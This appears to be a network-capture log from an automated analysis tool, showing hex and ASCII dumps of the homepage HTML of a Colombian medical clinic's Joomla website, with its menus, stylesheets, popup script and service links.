2023-03-22 04:45:57 UTC	3177	IN	Data Raw: 37 63 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20 Data Ascii: 7c50<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
2023-03-22 04:45:57 UTC	3177	IN	Data Raw: 72 65 66 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f Data Ascii: ref="/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/
2023-03-22 04:45:57 UTC	3178	IN	Data Raw: 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 Data Ascii: dia/system/js/core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script
2023-03-22 04:45:57 UTC	3180	IN	Data Raw: 73 2f 68 74 6d 6c 35 73 68 69 76 2d 70 72 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 Data Ascii: s/html5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script>
2023-03-22 04:45:57 UTC	3181	IN	Data Raw: 63 6c 69 6e 69 63 61 2f 6c 6f 67 6f 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 Data Ascii: clinica/logo_horizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"
2023-03-22 04:45:57 UTC	3182	IN	Data Raw: 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d Data Ascii: item-container" href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-
2023-03-22 04:45:57 UTC	3184	IN	Data Raw: 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 Data Ascii: g-menu-item-content"><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-containe
2023-03-22 04:45:57 UTC	3185	IN	Data Raw: 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 Data Ascii: /nuestra-clinica/politicas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-ite
2023-03-22 04:45:57 UTC	3186	IN	Data Raw: 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 Data Ascii: enu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-drop
2023-03-22 04:45:57 UTC	3188	IN	Data Raw: 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 Data Ascii: ass="g-menu-item g-menu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu
2023-03-22 04:45:57 UTC	3189	IN	Data Raw: 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 Data Ascii: t"><span class="g-menu-item-title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><s
2023-03-22 04:45:57 UTC	3190	IN	Data Raw: 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f Data Ascii: -item-content"><span class="g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-co
2023-03-22 04:45:57 UTC	3192	IN	Data Raw: 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a Data Ascii: pan></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a>
2023-03-22 04:45:57 UTC	3193	IN	Data Raw: 7a 61 20 64 65 6c 20 6d 61 c3 b1 61 6e 61 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 Data Ascii: za del maana</div></div> </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.1
2023-03-22 04:45:57 UTC	3194	IN	Data Raw: 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 Data Ascii: t: 'none', //elastic, fade or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeCli
2023-03-22 04:45:57 UTC	3196	IN	Data Raw: 3b 0d 0a 09 72 65 66 49 44 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c Data Ascii: ;refID.style.display = "none";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><
2023-03-22 04:45:57 UTC	3197	IN	Data Raw: 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c Data Ascii: v class="g-animatedblock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div cl
2023-03-22 04:45:57 UTC	3198	IN	Data Raw: 68 6f 6e 65 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 Data Ascii: hone"><img src="/images/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-a
2023-03-22 04:45:57 UTC	3200	IN	Data Raw: 2f 61 70 6f 79 6f 5f 64 69 61 67 6e 6f 73 74 69 63 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 Data Ascii: /apoyo_diagnostico.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></di
2023-03-22 04:45:57 UTC	3201	IN	Data Raw: 75 6e 61 63 69 c3 b3 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 Data Ascii: unacin</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoi
